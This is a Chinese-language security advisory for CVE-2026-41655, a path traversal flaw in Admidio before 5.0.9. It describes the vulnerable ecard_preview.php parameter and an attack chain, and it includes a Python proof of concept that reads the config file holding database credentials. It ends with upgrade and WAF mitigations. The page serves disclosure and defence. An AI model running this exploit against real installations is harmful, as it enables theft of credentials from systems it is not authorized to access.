CVE-2026-41655 CVSS 6.5 中危

CVE-2026-41655 Admidio路径遍历漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41655

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Admidio

漏洞概述

Admidio是一个开源的用户管理解决方案。在5.0.9版本之前，ecard_preview.php端点未对ecard_template POST参数进行安全文件名验证，直接将其传递给ECard::getEcardTemplate()方法。经过身份认证的用户可提交路径遍历载荷（如../config.php）读取Web服务器进程可访问的任意文件，包括包含数据库凭据的adm_my_files/config.php文件。该问题已在5.0.9版本中修复。

技术细节

该漏洞源于Admidio在处理电子卡片预览请求时，对用户输入的`ecard_template`参数缺乏严格的路径校验。具体而言，`ecard_preview.php`脚本接收用户提交的POST数据，并将参数直接传递给`ECard::getEcardTemplate()`函数以加载文件。由于未过滤`../`等目录跳转字符，攻击者可以利用此缺陷跳出受限制的目录。攻击者只需拥有低权限账号，即可构造包含恶意路径的请求。例如，通过设置`ecard_template`为`../../adm_my_files/config.php`，服务器会解析并返回该配置文件的内容，导致数据库密码等敏感信息泄露，进一步危及服务器安全。

攻击链分析

STEP 1

侦察

攻击者识别目标系统运行的是Admidio用户管理系统，且版本低于5.0.9。

STEP 2

获取凭证

攻击者注册或使用已有的低权限账号登录系统，获取有效的Session Cookie。

STEP 3

漏洞利用

攻击者向ecard_preview.php端点发送POST请求，在ecard_template参数中注入路径遍历载荷（如../../adm_my_files/config.php）。

STEP 4

数据窃取

服务器端解析恶意路径，将敏感配置文件内容返回给攻击者，导致数据库凭证泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target.com/admidio/adm_program/modules/ecards/ecard_preview.php"
# Payload to read the configuration file containing database credentials
payload = {
    "ecard_template": "../../adm_my_files/config.php"
}
# Authentication is required (Low Privileges)
cookies = {
    "PHPSESSID": "valid_session_id_of_authenticated_user"
}

response = requests.post(target_url, data=payload, cookies=cookies)

if response.status_code == 200:
    print("Vulnerability exploited successfully!")
    print("Response content:")
    print(response.text)
else:
    print("Exploit failed.")

影响范围

Admidio < 5.0.9

防御指南

临时缓解措施

建议立即升级Admidio至5.0.9或更高版本。如无法立即升级，应通过Web应用防火墙（WAF）拦截针对ecard_preview.php的恶意POST请求，并严格限制Web目录对adm_my_files/config.php等敏感文件的直接访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表